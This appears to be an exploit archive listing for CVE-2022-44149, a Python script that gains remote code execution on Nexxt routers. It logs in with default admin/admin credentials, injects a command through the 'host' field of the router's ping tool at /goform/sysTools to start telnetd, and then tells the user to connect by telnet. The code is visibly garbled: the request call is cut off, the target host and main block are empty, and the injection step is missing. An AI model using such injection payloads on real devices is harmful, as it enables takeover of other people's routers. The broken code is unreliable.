Nexxt Router Firmware Remote Code Execution

Nexxt Router Firmware version authenticated remote code execution exploit that enables telnetd.

SHA-256 | f6b93f8ca64ede0f2262b8069bea1bb4e92c90797cdd7f00227408d3d9a7adb8

# Exploit Title: Nexxt Router Firmware - Remote Code Execution (RCE) (Authenticated)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage:
# Version:
# Tested on: ARN02304U8
# CVE : CVE-2022-44149

import requests
import base64

router_host = ""
username = "admin"
password = "admin"

def main():
print("connect to router using: `telnet "+router_host.split("//")[1]+ "` using known credentials")

def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")

def send_payload(payload):
url = router_host+"/goform/sysTools"
headers = {"Authorization": "Basic {}".format(gen_header(username, password))}
params = {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK"}, headers=headers, data=params)

if __name__ == '__main__':

Related Posts